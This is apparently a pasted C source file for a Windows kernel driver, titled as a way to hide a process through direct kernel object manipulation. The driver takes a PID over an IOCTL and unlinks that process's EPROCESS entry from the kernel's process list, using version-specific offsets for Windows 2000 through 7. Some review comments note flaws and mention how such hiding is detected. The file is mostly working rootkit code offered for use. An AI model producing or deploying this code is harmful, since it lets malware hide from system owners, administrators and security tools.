chino

Hiding a process using DKOM

Mar 24th, 2014 (edited)
#include <ntifs.h>

/* Win32-style aliases used by the rest of this file (ntifs.h does not
 * provide them).  BYTE is declared but not referenced anywhere in this file. */
typedef unsigned long      DWORD;
typedef unsigned char      BYTE;
typedef unsigned short int WORD;


/* Hand-written layout of LDR_DATA_TABLE_ENTRY (a per-module loader record).
 * It is not referenced anywhere in this file.
 * NOTE(review): this is a manual transcription of an undocumented structure
 * (note the commented-out EntryPointActivationContext member), so the field
 * order and offsets are specific to whichever kernel build it was copied
 * from - verify against the target build before relying on it. */
typedef struct _LDR_DATA_TABLE_ENTRY {
  LIST_ENTRY    InLoadOrderLinks;
  LIST_ENTRY    InMemoryOrderLinks;
  LIST_ENTRY    InInitializationOrderLinks;
  PVOID      DllBase;
  PVOID      EntryPoint;
  ULONG      SizeOfImage;
  UNICODE_STRING  FullDllName;
  UNICODE_STRING  BaseDllName;
  ULONG      Flags;
  WORD       LoadCount;
  WORD       TlsIndex;

  union{
     LIST_ENTRY HashLinks;
     struct{
        PVOID SectionPointer;
        ULONG CheckSum;
     };
  };

  union{
     ULONG TimeDataStamp;
     PVOID LoadedImports;
  };

  //_ACTIVATION_CONTEXT * EntryPointActivationContext;
  PVOID PatchInformation;
  LIST_ENTRY ForwarderLinks;
  LIST_ENTRY ServiceTagLinks;
  LIST_ENTRY StaticLinks;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;


/* NT device name (created in DriverEntry) and the DosDevices alias
 * (deleted in UnloadDriver). */
#define DriverName L"\\Device\\HideProcess"
#define DosDeviceName L"\\DosDevices\\HideProcess"


/* Forward declaration for the routine that IOCTLDispatch calls; the
 * definition below documents its behaviour and return values. */
NTSTATUS HideProcessByDKOM(IN DWORD dwTargetPID);

/* IRP_MJ_CREATE handler.  Reports success and nothing else: pIrp is neither
 * filled in nor completed in this routine. */
NTSTATUS CreateDriver(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
    (void)pDeviceObject;
    (void)pIrp;

    return STATUS_SUCCESS;
}

/* IRP_MJ_CLOSE handler.  Mirrors CreateDriver: returns success without
 * touching or completing pIrp. */
NTSTATUS CloseDriver(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
    (void)pDeviceObject;
    (void)pIrp;

    return STATUS_SUCCESS;
}

/* DriverUnload callback.  Deletes the DosDevices alias named by DosDeviceName
 * and the device object reachable from pDriverObject->DeviceObject.  The
 * status returned by IoDeleteSymbolicLink is deliberately discarded; nothing
 * else done by this driver is undone here. */
void UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    UNICODE_STRING symlinkName;

    RtlInitUnicodeString(&symlinkName, DosDeviceName);
    (void)IoDeleteSymbolicLink(&symlinkName);

    IoDeleteDevice(pDriverObject->DeviceObject);
}

/* Default handler installed for every major function DriverEntry does not
 * handle explicitly.  Returns STATUS_NOT_SUPPORTED without completing pIrp. */
NTSTATUS Unsupported(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
    (void)pDeviceObject;
    (void)pIrp;

    return STATUS_NOT_SUPPORTED;
}

/* IRP_MJ_DEVICE_CONTROL handler.
 *
 * Control code 0x8000000 reads a DWORD PID from the buffered input
 * (AssociatedIrp.SystemBuffer) and passes it to HideProcessByDKOM; any other
 * control code is accepted and ignored.  The IRP is always completed with
 * STATUS_SUCCESS and Information = 0, even when HideProcessByDKOM fails -
 * only this function's return value carries that status.
 *
 * NOTE(review): Parameters.DeviceIoControl.InputBufferLength is never
 * compared against sizeof(DWORD) before the buffer is dereferenced, so
 * nothing here guarantees the caller supplied a full DWORD. */
NTSTATUS IOCTLDispatch(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
    PIO_STACK_LOCATION pIoStack = IoGetCurrentIrpStackLocation(pIrp);
    NTSTATUS NtStatus = STATUS_SUCCESS;

    (void)pDeviceObject;

    switch (pIoStack->Parameters.DeviceIoControl.IoControlCode)
    {
    case 0x8000000: /* Your Control Code */
    {
        DWORD *pTargetPid = (DWORD *)pIrp->AssociatedIrp.SystemBuffer;

        if (pTargetPid != NULL)
            NtStatus = HideProcessByDKOM(*pTargetPid);
        break;
    }

    default:
        break;
    }

    /* Completion status does not reflect NtStatus; see header comment. */
    pIrp->IoStatus.Status = STATUS_SUCCESS;
    pIrp->IoStatus.Information = 0;

    IoCompleteRequest(pIrp, IO_NO_INCREMENT);

    return NtStatus;
}

/* Unlinks the process identified by dwTargetPID from a kernel-internal
 * doubly-linked list by rewriting the LIST_ENTRY that sits at a hard-coded,
 * version-dependent byte offset inside its EPROCESS (direct kernel object
 * manipulation).  Only the two link pointers of that entry and the matching
 * pointers of its two neighbours are written; nothing else in the object is
 * touched.
 *
 * Returns STATUS_SUCCESS when dwTargetPID is 0 (nothing is done), the
 * PsLookupProcessByProcessId status when the PID cannot be resolved,
 * STATUS_UNSUCCESSFUL for an OS version missing from the table below, and
 * STATUS_SUCCESS once the list has been rewritten.
 *
 * NOTE(review): the offset table is keyed on the major/minor version only -
 * no architecture or build check is made - and no lock is acquired anywhere
 * in this function, so a concurrent walker of the same list can observe the
 * neighbours in a half-updated state.
 *
 * Forensics note: because the object itself is left intact, it presumably
 * remains reachable through whatever other kernel structures reference it;
 * comparing this list against another view of the same processes is the
 * usual way such an unlinked entry is noticed - confirm for the target build. */
NTSTATUS HideProcessByDKOM(IN DWORD dwTargetPID)
{
    PLIST_ENTRY pPrevList, pCurrentList, pNextList;
    ULONG MajorVersion, MinorVersion, offset = 0x00;
    PEPROCESS pEprocess;
    NTSTATUS NtStatus = STATUS_SUCCESS;

    if(dwTargetPID == 0)
        return STATUS_SUCCESS;

    /* Takes a reference on the EPROCESS; every later exit must release it. */
    NtStatus = PsLookupProcessByProcessId((HANDLE)dwTargetPID, &pEprocess);
    if(!NT_SUCCESS(NtStatus))
    {
        return NtStatus;
    }

    //DebugPrint("EPROCESS:0x%08X\n",pEprocess);

    /* Byte offset of the target LIST_ENTRY inside EPROCESS, chosen by the
     * running kernel's major/minor version only. */
    PsGetVersion(&MajorVersion, &MinorVersion, NULL, NULL);
    if(MajorVersion == 5 && MinorVersion == 0) //Windows 2000
        offset = 0xA0;
    else if(MajorVersion == 5 && MinorVersion == 1) //Windows XP
        offset = 0x88;
    else if(MajorVersion == 6 && MinorVersion == 0) //Windows Vista
        offset = 0xA0;
    else if(MajorVersion == 6 && MinorVersion == 1) //Windows 7
        offset = 0xB8;
    else {
        ObDereferenceObject(pEprocess);
        return STATUS_UNSUCCESSFUL;
    }

    /* Unreachable: every branch above either sets a non-zero offset or
     * returns.  If it were ever reached it would return without releasing
     * the reference taken above. */
    if(offset == 0)
        return STATUS_UNSUCCESSFUL;


    //Hiding: splice the entry out of the list, then point it at itself.
    //The self-link is presumably so that any later unlink of this same
    //entry does not touch the (now stale) former neighbours - verify.
    pCurrentList = (PLIST_ENTRY)((PUCHAR)pEprocess + offset);
    pPrevList    = (PLIST_ENTRY)pCurrentList->Blink;
    pNextList    = (PLIST_ENTRY)pCurrentList->Flink;

    pPrevList->Flink = (PLIST_ENTRY)pNextList;
    pNextList->Blink = (PLIST_ENTRY)pPrevList;

    pCurrentList->Flink = (PLIST_ENTRY)pCurrentList;
    pCurrentList->Blink = (PLIST_ENTRY)pCurrentList;


    /* Releases the reference from PsLookupProcessByProcessId. */
    ObDereferenceObject(pEprocess);

    return STATUS_SUCCESS;
}

/* Driver entry point: creates the \Device\HideProcess device object, installs
 * the dispatch table and clears DO_DEVICE_INITIALIZING.
 *
 * pRegistryPath is not used.  uDosDeviceName is initialised but not used in
 * this function.  The MajorFunction loop uses '<', so the slot at index
 * IRP_MJ_MAXIMUM_FUNCTION itself is never assigned here.
 * NOTE(review): STATUS_WAIT_1 is a success code, so NT_SUCCESS() is already
 * true for it and the exemption in the error check below can never match. */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    UNICODE_STRING uDriverName, uDosDeviceName;
    PDEVICE_OBJECT pDeviceObject = NULL;
    NTSTATUS       NtStatus;
    int            major;

    (void)pRegistryPath;

    RtlInitUnicodeString(&uDriverName, DriverName);
    RtlInitUnicodeString(&uDosDeviceName, DosDeviceName);

    NtStatus = IoCreateDevice(pDriverObject, 0, &uDriverName, FILE_DEVICE_UNKNOWN,
                              FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);
    if (!NT_SUCCESS(NtStatus) && NtStatus != STATUS_WAIT_1)
        return NtStatus;

    /* Default every handled-by-loop slot to Unsupported, then override the
     * three requests this driver actually services. */
    for (major = 0; major < IRP_MJ_MAXIMUM_FUNCTION; major++)
        pDriverObject->MajorFunction[major] = Unsupported;

    pDriverObject->MajorFunction[IRP_MJ_CREATE]         = CreateDriver;
    pDriverObject->MajorFunction[IRP_MJ_CLOSE]          = CloseDriver;
    pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = IOCTLDispatch;
    pDriverObject->DriverUnload                         = UnloadDriver;

    pDeviceObject->Flags |= DO_DIRECT_IO;
    pDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;

    return STATUS_SUCCESS;
}